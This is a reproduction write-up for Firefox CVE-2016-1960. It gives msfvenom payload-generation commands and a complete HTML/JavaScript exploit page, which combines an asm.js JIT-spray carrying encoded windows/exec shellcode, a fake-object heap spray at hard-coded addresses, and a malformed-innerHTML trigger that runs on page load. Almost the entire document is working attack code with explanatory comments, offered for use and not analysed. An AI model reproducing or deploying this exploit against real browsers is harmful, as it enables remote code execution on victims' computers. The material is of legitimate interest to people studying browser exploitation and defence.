Firefox CVE-2016-1960 复现


FIREFOX-CVE-2016-1960

Tools

shellcode2asmjs

metasploit

payload

受影响firefox

Mozilla Firefox < 45
msfvenom --payload windows/exec CMD=calc.exe 
sc2asmjs.py

make payload

msfvenom --payload windows/exec CMD=notepad.exe EXITFUNC=seh -f python -o msf_windows_exec_notepad.py

exp

<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"

/**
 * Bundles the two spray helpers that go() drives: the fake-object heap spray
 * (Heap) and the asm.js constant-pool spray (Asmjs). Both are created eagerly
 * so that go() only has to sequence the calls.
 * @constructor
 */
function Exploit() {
  this.heap = new Heap();
  this.asmjs = new Asmjs();
}

/**
 * Entry point, invoked from the body onload handler.
 * Sequences the two sprays and then the trigger; the order is load-bearing —
 * both sprays must be resident before trigger_vuln() runs — so none of the
 * three calls can be moved.
 * The two constants are hard-coded absolute addresses; the technique assumes
 * predictable heap and JIT placement on the build the write-up targets
 * (the page lists Firefox < 45 and the comment below names Fx 44.0.2) and
 * nothing verifies that either address is actually populated.
 * @returns {undefined}
 */
Exploit.prototype.go = function(){
/* target address of fake node object */
var node_target_addr = 0x20200000

/* target address of asm.js float pool payload*/
var target_eip = 0x3c3c1dc8

/* spray fake Node objects */
this.heap.spray(node_target_addr, target_eip)

/* spray asm.js float constant pools */
this.asmjs.spray_float_payload(0x1800)

/* go! */
this.trigger_vuln(node_target_addr)
};


/**
 * Reaches the vulnerable HTML-parser path once the sprays are in place.
 * Steps, in order:
 *  1. seed the document with a <table><svg><div> tree and force a GC;
 *  2. allocate 0x11000 Uint32Arrays of 0x100 bytes each, every element set to
 *     node_ptr — per the author's note this is what makes the out-of-bounds
 *     element read (the "integer underflow") yield node_ptr as a Node pointer;
 *  3. assign the malformed innerHTML that the author found reaches an easier
 *     code path than the original crashing testcase, then reload.
 * The reload is unconditional; presumably it serves as a retry when the
 * corruption does not land — inferred, the page does not say.
 * Only the markup in step 3 is specific to the bug; steps 1–2 are generic
 * heap grooming and should not be read as documented engine behaviour.
 * @param {number} node_ptr - address the sprayed fake Node object is expected to occupy.
 * @returns {undefined}
 */
Exploit.prototype.trigger_vuln = function(node_ptr){
document.body.innerHTML = '<table><svg><div id="AAAA">'
this.heap.gc()
var a = new Array()
for (var i=0; i < 0x11000; i++){
/* array element (Node object ptr) control with integer underflow */
a[i] = new Uint32Array(0x100/4)
for (var j=0; j<0x100/4; j++)
a[i][j] = node_ptr
}

/* original crashing testcase
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
*/

/* easier to exploit codepath */
document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';

window.location.reload()
};


var Asmjs = function(){};

/**
 * asm.js module whose only purpose is to be compiled.
 * The 24 double literals are, per the author's comment, the msfvenom
 * windows/exec payload re-encoded as IEEE-754 doubles by sc2asmjs.py; the
 * asm.js compiler emits them verbatim into a float constant pool, which on
 * the Fx 44.0.2 build named below sits at a page-relative offset of 0x1dc8
 * (the low bits of target_eip in go()). That is the "ASM.JS JIT-Spray" of the
 * page title.
 * Consequently the body must stay byte-for-byte: changing a literal, the
 * argument count, the +coercions or the statement shape would either alter
 * the emitted pool or fail asm.js validation, and the module would silently
 * fall back to ordinary JS.
 * The returned payload() is never invoked anywhere on the page —
 * compilation alone is what the write-up relies on.
 * @param {object} stdlib - asm.js stdlib argument; unused here (window is passed).
 * @param {{foo: function}} ffi - foreign-function table; foo is the call that carries the literals.
 * @returns {function(): number} the compiled payload function (never called).
 */
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
"use asm"
var foo = ffi.foo
function payload(){
var val = 0.0
/* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
val = +foo(
// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
-1.587865768352248e-263,
-8.692422460804815e-255,
7.529882109376901e-114,
2.0120602207293977e-16,
3.7204662687249914e-242,
4.351158092040946e+89,
2.284741716118451e+270,
7.620699014501263e-153,
5.996021286047645e+44,
-5.981935902612295e-92,
6.23540918304361e+259,
1.9227873281657598e+256,
2.0672493951546363e+187,
-6.971032919585734e+91,
5.651413300798281e-134,
-1.9040061366251406e+305,
-1.2687640718807038e-241,
9.697849844423e-310,
-2.0571400761625145e+306,
-1.1777948610587587e-123,
2.708909852013898e+289,
3.591750823735296e+37,
-1.7960516725035723e+106,
6.326776523166028e+180
)
return +val;
}
/* exporting payload is required for the module to validate; callers keep but never call it */
return payload
};

/**
 * Compiles `regions` separate copies of the asm.js module and keeps the
 * returned payload functions alive on this.modules so their compiled code
 * (and constant pools) is not collected. Each copy is linked with its own
 * fresh ffi object whose foo() does nothing.
 * @param {number} regions - number of module instances to compile.
 * @returns {undefined}
 */
Asmjs.prototype.spray_float_payload = function (regions) {
  // new Array(regions) keeps the original's RangeError on an invalid length;
  // Array.from walks the holes and links one module per slot.
  this.modules = Array.from(new Array(regions), () =>
    this.asm_js_module(window, { foo: () => 0 }),
  );
};

/**
 * Owner of the sprayed Uint32Array blocks; spray() appends to node_heap so
 * the blocks stay reachable and are not reclaimed by the GC.
 * @param {number} [target_addr] - unused; spray() receives the address directly.
 * @param {number} [eip] - unused; spray() receives the value directly.
 * @constructor
 */
function Heap(target_addr, eip) {
  this.node_heap = [];
}


/**
 * Heap spray of fake objects.
 * Allocates just-under-16 MiB Uint32Array blocks, one per 0x1000000 step of a
 * bookkeeping counter that runs from 0x08000000 up to node_target_addr, and
 * stamps the same fake-object layout at every 1 MiB boundary inside each
 * block so that whatever block ends up at node_target_addr presents that
 * layout there.
 * The field offsets and values (0x29 at +0x00, 3 at +0x0c, 1 at +0x18, a
 * junk marker at +0x1c, pointers back into the same fake object at
 * +0x14/+0x20/+0x24/+0x28, and target_eip at +0x2c) come from the author;
 * the page explains them only as "needed to control EIP", so treat them as
 * opaque layout facts rather than documented structure.
 * Nothing here verifies placement: current_address is not a real allocation
 * address, and the technique simply assumes the allocator hands out these
 * ranges predictably. The blocks are parked on this.node_heap so they are
 * not collected.
 * @param {number} node_target_addr - address the fake object is expected to occupy.
 * @param {number} target_eip - value written at +0x2c of every fake object.
 * @returns {undefined}
 */
Heap.prototype.spray = function(node_target_addr, target_eip){
var junk = 0x13371337
var current_address = 0x08000000
var block_size = 0x1000000
/* loop until the sprayed range is expected to cover node_target_addr */
while(current_address < node_target_addr){
/* 0x400 bytes short of block_size — presumably headroom for the array/allocator header; inferred, not stated on the page */
var fake_objects = new Uint32Array(block_size/4 - 0x100)
for (var offset = 0; offset < block_size; offset += 0x100000){
/* target Node object needed to control EIP */
fake_objects[offset/4 + 0x00/4] = 0x29
fake_objects[offset/4 + 0x0c/4] = 3
fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
fake_objects[offset/4 + 0x18/4] = 1
fake_objects[offset/4 + 0x1c/4] = junk
fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
fake_objects[offset/4 + 0x2c/4] = target_eip
}
this.node_heap.push(fake_objects)
current_address += block_size
}
};

/**
 * Best-effort attempt to provoke a garbage-collection cycle by allocating
 * eleven 16 MiB ArrayBuffers and immediately dropping them. Whether a
 * collection actually runs is up to the engine; nothing here checks for it.
 * @returns {undefined}
 */
Heap.prototype.gc = function () {
  let round = 0;
  while (round <= 10) {
    // The buffer is deliberately discarded; only the allocation pressure matters.
    void new ArrayBuffer(0x1000000);
    round += 1;
  }
};

</script>
</head>
<body onload='exploit = new Exploit(); exploit.go()' />